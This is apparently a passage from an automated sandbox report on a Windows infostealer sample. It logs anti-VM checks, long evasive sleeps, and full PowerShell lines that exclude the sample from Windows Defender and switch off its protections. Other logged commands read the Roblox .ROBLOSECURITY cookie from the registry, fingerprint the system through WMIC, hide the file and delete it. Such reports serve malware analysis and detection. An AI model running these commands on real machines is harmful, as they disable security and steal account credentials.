Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4220	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6492	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6432	Thread sleep count: 3702 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6264	Thread sleep count: 1954 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8120	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8092	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2508	Thread sleep count: 3154 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2508	Thread sleep count: 907 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2968	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7956	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct

Source: C:\Windows\System32\PING.EXE

Last function: Thread delayed

Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 99857	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 99741	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 99628	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 99500	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 99390	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 99281	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 99172	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 99062	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 98953	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 98843	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 98734	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 98625	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 598513	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 598187	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 597966	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 597843	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 597624	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 597515	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 597278	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 597169	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 597061	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 596950	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 596843	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 596734	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Thread delayed: delay time: 596624	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: WE8zqotCFj.exe	Binary or memory string: vboxtray
Source: WE8zqotCFj.exe	Binary or memory string: vboxservice
Source: WE8zqotCFj.exe	Binary or memory string: qemu-ga
Source: Fke9TkbC12tBAtr.ligma.0.dr	Binary or memory string: YvMcI
Source: WE8zqotCFj.exe	Binary or memory string: vmwareuser
Source: WE8zqotCFj.exe	Binary or memory string: vmusrvc
Source: WE8zqotCFj.exe	Binary or memory string: vmwareservice+discordtokenprotector
Source: WE8zqotCFj.exe	Binary or memory string: vmsrvc
Source: WE8zqotCFj.exe	Binary or memory string: vmtoolsd
Source: WE8zqotCFj.exe	Binary or memory string: vmwaretray
Source: WE8zqotCFj.exe, 00000000.00000002.1996646653.0000023284E42000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\WE8zqotCFj.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WE8zqotCFj.exe'
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WE8zqotCFj.exe'			Jump to behavior

Modifies Windows Defender protection settings

Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2	Jump to behavior

Modifies the hosts file

Source: C:\Users\user\Desktop\WE8zqotCFj.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\WE8zqotCFj.exe"	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WE8zqotCFj.exe'	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get Caption	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemory	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get name	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\WE8zqotCFj.exe" && pause	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost

Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2			Jump to behavior

Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Queries volume information: C:\Users\user\Desktop\WE8zqotCFj.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
